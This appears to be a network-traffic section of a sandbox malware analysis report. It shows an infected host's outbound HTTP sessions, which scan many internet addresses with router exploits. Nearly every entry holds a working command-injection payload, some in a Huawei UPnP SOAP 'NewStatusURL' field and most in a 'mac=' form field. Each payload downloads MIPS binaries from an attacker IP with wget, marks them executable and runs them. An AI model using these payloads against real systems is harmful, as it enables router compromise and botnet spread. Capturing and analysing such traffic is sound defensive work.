                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        923192.168.2.233320682.208.97.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.353813887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        924192.168.2.2350142186.63.42.688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.411434889 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        925192.168.2.2343376133.251.55.2298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.411493063 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        926192.168.2.235226080.142.251.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438098907 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        927192.168.2.2360262138.233.63.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438164949 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        928192.168.2.2343146107.184.176.608080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438186884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        929192.168.2.23602668.150.106.308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438237906 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        930192.168.2.234581293.204.125.2008080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438256025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        931192.168.2.2343494110.234.239.1498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438282013 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        932192.168.2.234619646.255.98.2048080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438309908 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        933192.168.2.234734087.159.210.2108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438323975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        934192.168.2.235881880.235.208.48080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438350916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        935192.168.2.2342510131.179.14.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438642025 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        936192.168.2.2356704136.255.51.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438653946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        937192.168.2.2360242181.160.49.648080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438708067 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        938192.168.2.2344614142.207.212.128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438736916 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        939192.168.2.235206862.187.112.2488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438765049 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        940192.168.2.2358324128.95.149.1618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438915014 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        941192.168.2.2337838159.112.243.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438945055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        942192.168.2.235442261.129.82.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.438945055 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        943192.168.2.2360498183.249.123.688080
                                                        TimestampBytes transferredDirectionData
